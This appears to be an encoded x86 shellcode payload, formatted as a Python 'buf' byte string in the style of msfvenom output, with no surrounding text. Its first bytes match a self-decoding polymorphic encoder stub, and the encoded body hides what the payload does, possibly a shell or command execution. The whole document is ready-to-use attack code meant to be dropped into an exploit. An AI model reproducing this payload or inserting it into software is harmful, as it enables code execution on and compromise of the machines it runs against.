buf =  b""
buf += b"\xb8\xc6\x5f\x0e\xfd\xdb\xca\xd9\x74\x24\xf4\x5b"
buf += b"\x33\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x85"
buf += b"\x51\xec\x08\xf5\x86\x72\xf2\x05\x57\x13\x7a\xe0"
buf += b"\x66\x13\x18\x61\xd8\xa3\x6a\x27\xd5\x48\x3e\xd3"
buf += b"\x6e\x3c\x97\xd4\xc7\x8b\xc1\xdb\xd8\xa0\x32\x7a"
buf += b"\x5b\xbb\x66\x5c\x62\x74\x7b\x9d\xa3\x69\x76\xcf"
buf += b"\x7c\xe5\x25\xff\x09\xb3\xf5\x74\x41\x55\x7e\x69"
buf += b"\x12\x54\xaf\x3c\x28\x0f\x6f\xbf\xfd\x3b\x26\xa7"
buf += b"\xe2\x06\xf0\x5c\xd0\xfd\x03\xb4\x28\xfd\xa8\xf9"
buf += b"\x84\x0c\xb0\x3e\x22\xef\xc7\x36\x50\x92\xdf\x8d"
buf += b"\x2a\x48\x55\x15\x8c\x1b\xcd\xf1\x2c\xcf\x88\x72"
buf += b"\x22\xa4\xdf\xdc\x27\x3b\x33\x57\x53\xb0\xb2\xb7"
buf += b"\xd5\x82\x90\x13\xbd\x51\xb8\x02\x1b\x37\xc5\x54"
buf += b"\xc4\xe8\x63\x1f\xe9\xfd\x19\x42\x66\x31\x10\x7c"
buf += b"\x76\x5d\x23\x0f\x44\xc2\x9f\x87\xe4\x8b\x39\x50"
buf += b"\x0a\xa6\xfe\xce\xf5\x49\xff\xc7\x31\x1d\xaf\x7f"
buf += b"\x93\x1e\x24\x7f\x1c\xcb\xeb\x2f\xb2\xa4\x4b\x9f"
buf += b"\x72\x15\x24\xf5\x7c\x4a\x54\xf6\x56\xe3\xff\x0d"
buf += b"\x31\x06\x0a\x07\x40\x7e\x08\x17\x53\x23\x85\xf1"
buf += b"\x39\xcb\xc3\xaa\xd5\x72\x4e\x20\x47\x7a\x44\x4d"
buf += b"\x47\xf0\x6b\xb2\x06\xf1\x06\xa0\xff\xf1\x5c\x9a"
buf += b"\x56\x0d\x4b\xb2\x35\x9c\x10\x42\x33\xbd\x8e\x15"
buf += b"\x14\x73\xc7\xf3\x88\x2a\x71\xe1\x50\xaa\xba\xa1"
buf += b"\x8e\x0f\x44\x28\x42\x2b\x62\x3a\x9a\xb4\x2e\x6e"
buf += b"\x72\xe3\xf8\xd8\x34\x5d\x4b\xb2\xee\x32\x05\x52"
buf += b"\x76\x79\x96\x24\x77\x54\x60\xc8\xc6\x01\x35\xf7"
buf += b"\xe7\xc5\xb1\x80\x15\x76\x3d\x5b\x9e\x86\x74\xc1"
buf += b"\xb7\x0e\xd1\x90\x85\x52\xe2\x4f\xc9\x6a\x61\x65"
buf += b"\xb2\x88\x79\x0c\xb7\xd5\x3d\xfd\xc5\x46\xa8\x01"
buf += b"\x79\x66\xf9"
